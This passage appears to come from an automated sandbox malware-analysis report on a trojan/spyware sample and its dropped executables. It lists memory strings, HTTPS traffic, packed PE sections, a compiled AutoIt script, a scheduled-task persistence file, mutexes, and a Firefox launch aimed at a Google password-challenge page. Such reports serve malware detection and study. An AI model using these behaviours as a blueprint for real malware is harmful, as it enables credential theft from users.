Source: firefox.exe, 0000001C.00000002.3213139863.000002682A803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/policies/privacy/
Source: firefox.exe, 0000001C.00000002.3213139863.000002682A803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/policies/privacy/mozIGeckoMediaPluginChromeService
Source: ee8d47a049.exe, 0000000C.00000003.2945838714.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2897844362.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2993784315.0000000001102000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2967613756.00000000010B9000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2958718238.00000000010C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/reca
Source: ee8d47a049.exe, 0000000E.00000002.3053059022.0000000001177000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/recaptcha/
Source: firefox.exe, 0000001C.00000002.3213139863.000002682A824000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3083238118.000002682E000000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3085509496.000002682E210000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search
Source: ee8d47a049.exe, 0000000E.00000002.3053059022.0000000001177000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: ee8d47a049.exe, 0000000E.00000002.3053059022.0000000001177000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: file.exe, 00000000.00000003.2249642541.00000000053C7000.00000004.00000800.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2926031923.000000000583A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.or
Source: firefox.exe, 0000001C.00000002.3211863654.000002682A703000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: ee8d47a049.exe, 0000000C.00000003.2926303044.0000000005917000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: ee8d47a049.exe, 0000000C.00000003.2926303044.0000000005917000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: ee8d47a049.exe, 0000000C.00000003.2926303044.0000000005917000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 0000001C.00000002.3242551338.000002682F817000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/new/
Source: firefox.exe, 0000001C.00000002.3242551338.000002682F817000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/new/SELECT
Source: firefox.exe, 0000001C.00000002.3242551338.000002682F83B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 0000001C.00000002.3216509308.000002682B603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3242551338.000002682F83B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
Source: firefox.exe, 0000001C.00000002.3275031797.0000026832108000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-contentP
Source: firefox.exe, 0000001C.00000002.3275031797.0000026832108000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/V
Source: firefox.exe, 0000001C.00000002.3242551338.000002682F83B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3289963540.00002AA3DFA35000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com
Source: firefox.exe, 0000001C.00000002.3226223465.000002682E05D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.olx.pl/
Source: firefox.exe, 0000001C.00000002.3213139863.000002682A8AF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.openh264.org/
Source: firefox.exe, 0000001C.00000002.3275031797.0000026832108000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3216509308.000002682B62E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.reddit.com/
Source: firefox.exe, 0000001C.00000002.3289304414.000015D2F1003000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.reddit.com/Z
Source: file.exe, 00000000.00000003.2249981893.00000000006C9000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2926652624.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3216509308.000002682B664000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3216509308.000002682B62E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
Source: firefox.exe, 0000001C.00000002.3289304414.000015D2F1003000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3289963540.00002AA3DFA35000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.tsn.ca
Source: firefox.exe, 0000001C.00000002.3289304414.000015D2F1003000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.tsn.caZ
Source: ee8d47a049.exe, 0000000C.00000003.2993653031.0000000001110000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2945838714.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2897844362.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883437222.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883741777.0000000001105000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2958289959.0000000001109000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2975067077.0000000001109000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883941944.0000000001106000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Trans
Source: file.exe, 00000000.00000003.2208311275.000000000069F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199513745.0000000000694000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883437222.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883741777.0000000001105000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883909794.0000000001113000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3034649856.000000000114A000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3035132023.000000000114F000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3034566533.00000000011CA000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3034566533.00000000011C3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: firefox.exe, 0000001C.00000002.3213139863.000002682A803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.widevine.com/
Source: firefox.exe, 0000001C.00000002.3213139863.000002682A803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.widevine.com/get
Source: ee8d47a049.exe, 0000000E.00000002.3053059022.0000000001177000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com
Source: firefox.exe, 0000001C.00000002.3275031797.0000026832108000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3216509308.000002682B62E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3247966540.00000268302C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 0000001C.00000002.3289304414.000015D2F1003000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/Z
Source: firefox.exe, 0000001C.00000002.3226223465.000002682E05D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.zhihu.com/
Source: firefox.exe, 0000001C.00000002.3290440543.00003793D3B04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://yandex.com
Source: firefox.exe, 0000001C.00000002.3279699850.000002683686B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com
Source: firefox.exe, 0000001C.00000002.3271841943.0000026831F28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/
Source: firefox.exe, 0000001C.00000002.3242551338.000002682F817000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account
Source: firefox.exe, 0000001C.00000002.3271841943.0000026831F88000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 0000001A.00000002.3061577879.0000025A3C9AF000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3069067757.00000264A6E37000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3199975581.000002681DE79000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3306382173.00000138368D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
Source: firefox.exe, 0000001C.00000002.3199975581.000002681DE79000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd?
Source: firefox.exe, 0000001C.00000002.3201171185.000002681E103000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdm
Source: firefox.exe, 0000001C.00000002.3242551338.000002682F817000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/accounteEditorEnableWrapHackMaskgWindowsWithUnloadHandlerfractionalDataArray
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 50007 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50032 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown Network traffic detected: HTTP traffic on port 50078 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50049 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50026 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50003 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50062
Source: unknown Network traffic detected: HTTP traffic on port 50102 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50081 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50085 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50105
Source: unknown Network traffic detected: HTTP traffic on port 50010 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50091 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50069
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50102
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50026
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50103
Source: unknown Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown Network traffic detected: HTTP traffic on port 50103 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50080 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50088 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 50086 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50032
Source: unknown Network traffic detected: HTTP traffic on port 50092 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50078
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50033
Source: unknown Network traffic detected: HTTP traffic on port 50114 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50114
Source: unknown Network traffic detected: HTTP traffic on port 50050 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50081
Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50080
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50082
Source: unknown Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50085
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49998
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50007
Source: unknown Network traffic detected: HTTP traffic on port 50062 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 50033 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50086
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50088
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50003
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50049
Source: unknown Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50051 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50092
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50091
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50050
Source: unknown Network traffic detected: HTTP traffic on port 50006 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50051
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50082 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50105 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50069 -> 443
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:49722 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:49729 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:49740 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:49751 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:49766 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49998 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50000 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50002 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50003 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50005 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50006 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50007 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50010 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50012 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:50014 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:50078 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50080 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50081 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50082 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50085 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50086 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50088 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50091 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50092 version: TLS 1.2

System Summary
barindex
Binary is likely a compiled AutoIt script file
Source: 55662d7496.exe, 0000000F.00000000.3022048372.0000000000C82000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_6719b4f8-5
Source: 55662d7496.exe, 0000000F.00000000.3022048372.0000000000C82000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_b935d5ad-d
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: A94C1J5VAPFWM1J1FS.exe.0.dr Static PE information: section name:
Source: A94C1J5VAPFWM1J1FS.exe.0.dr Static PE information: section name: .idata
Source: A94C1J5VAPFWM1J1FS.exe.0.dr Static PE information: section name:
Source: PJGT15Z82T6C2GQS.exe.0.dr Static PE information: section name:
Source: PJGT15Z82T6C2GQS.exe.0.dr Static PE information: section name: .rsrc
Source: PJGT15Z82T6C2GQS.exe.0.dr Static PE information: section name: .idata
Source: PJGT15Z82T6C2GQS.exe.0.dr Static PE information: section name:
Source: 6BWDEAM9H4119O8P9KYSM4M710Q.exe.0.dr Static PE information: section name:
Source: 6BWDEAM9H4119O8P9KYSM4M710Q.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.3.dr Static PE information: section name:
Source: skotes.exe.3.dr Static PE information: section name: .idata
Source: skotes.exe.3.dr Static PE information: section name:
Source: random[1].exe.10.dr Static PE information: section name:
Source: random[1].exe.10.dr Static PE information: section name: .rsrc
Source: random[1].exe.10.dr Static PE information: section name: .idata
Source: ee8d47a049.exe.10.dr Static PE information: section name:
Source: ee8d47a049.exe.10.dr Static PE information: section name: .rsrc
Source: ee8d47a049.exe.10.dr Static PE information: section name: .idata
Source: random[1].exe0.10.dr Static PE information: section name:
Source: random[1].exe0.10.dr Static PE information: section name: .rsrc
Source: random[1].exe0.10.dr Static PE information: section name: .idata
Source: random[1].exe0.10.dr Static PE information: section name:
Source: 36c3130eac.exe.10.dr Static PE information: section name:
Source: 36c3130eac.exe.10.dr Static PE information: section name: .rsrc
Source: 36c3130eac.exe.10.dr Static PE information: section name: .idata
Source: 36c3130eac.exe.10.dr Static PE information: section name:
Source: LIZ1X768O6R3WBN7EPZHLFTDS.exe.12.dr Static PE information: section name:
Source: LIZ1X768O6R3WBN7EPZHLFTDS.exe.12.dr Static PE information: section name: .idata
Source: LIZ1X768O6R3WBN7EPZHLFTDS.exe.12.dr Static PE information: section name:
Source: ZR7XTEYLCJ0IZBOL3C6E.exe.12.dr Static PE information: section name:
Source: ZR7XTEYLCJ0IZBOL3C6E.exe.12.dr Static PE information: section name: .rsrc
Source: ZR7XTEYLCJ0IZBOL3C6E.exe.12.dr Static PE information: section name: .idata
Source: ZR7XTEYLCJ0IZBOL3C6E.exe.12.dr Static PE information: section name:
Source: Z72A5QS1XOE2OWTBBJM669OT.exe.12.dr Static PE information: section name:
Source: Z72A5QS1XOE2OWTBBJM669OT.exe.12.dr Static PE information: section name: .idata
PE file has a writeable .text section
Source: num[1].exe.10.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: num.exe.10.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Creates files inside the system directory
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Code function: 7_2_00ABFB3A 7_2_00ABFB3A
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\num[1].exe 27E4A3627D7DF2B22189DD4BEBC559AE1986D49A8F4E35980B428FADB66CF23D
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: ZLIB complexity 0.9996196885313532
Source: A94C1J5VAPFWM1J1FS.exe.0.dr Static PE information: Section: ZLIB complexity 0.9982118528610354
Source: A94C1J5VAPFWM1J1FS.exe.0.dr Static PE information: Section: sygcicsm ZLIB complexity 0.9947822991606715
Source: PJGT15Z82T6C2GQS.exe.0.dr Static PE information: Section: wyvqzkuk ZLIB complexity 0.9950803860792885
Source: skotes.exe.3.dr Static PE information: Section: ZLIB complexity 0.9982118528610354
Source: skotes.exe.3.dr Static PE information: Section: sygcicsm ZLIB complexity 0.9947822991606715
Source: random[1].exe.10.dr Static PE information: Section: ZLIB complexity 0.9996196885313532
Source: ee8d47a049.exe.10.dr Static PE information: Section: ZLIB complexity 0.9996196885313532
Source: random[1].exe0.10.dr Static PE information: Section: wyvqzkuk ZLIB complexity 0.9950803860792885
Source: 36c3130eac.exe.10.dr Static PE information: Section: wyvqzkuk ZLIB complexity 0.9950803860792885
Source: LIZ1X768O6R3WBN7EPZHLFTDS.exe.12.dr Static PE information: Section: ZLIB complexity 0.9982118528610354
Source: LIZ1X768O6R3WBN7EPZHLFTDS.exe.12.dr Static PE information: Section: sygcicsm ZLIB complexity 0.9947822991606715
Source: ZR7XTEYLCJ0IZBOL3C6E.exe.12.dr Static PE information: Section: wyvqzkuk ZLIB complexity 0.9950803860792885
Source: random[1].exe.10.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: Z72A5QS1XOE2OWTBBJM669OT.exe.12.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: ee8d47a049.exe.10.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: file.exe Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: 6BWDEAM9H4119O8P9KYSM4M710Q.exe.0.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: PJGT15Z82T6C2GQS.exe, 00000004.00000002.2516681456.00000000004A1000.00000040.00000001.01000000.00000007.sdmp, PJGT15Z82T6C2GQS.exe, 00000004.00000003.2428440432.0000000004E50000.00000004.00001000.00020000.00000000.sdmp, 36c3130eac.exe, 0000000D.00000003.2956398464.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, 36c3130eac.exe, 0000000D.00000002.2998225047.0000000000F11000.00000040.00000001.01000000.00000010.sdmp Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@72/23@55/9
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Code function: 7_2_04F115D0 ChangeServiceConfigA, 7_2_04F115D0
Source: C:\Users\user\AppData\Local\Temp\PJGT15Z82T6C2GQS.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\C7W1LMZJ.htm Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6196:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4436:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5112:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6548:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6984:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8068:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4860:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5708:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:948:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5796:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Jump to behavior
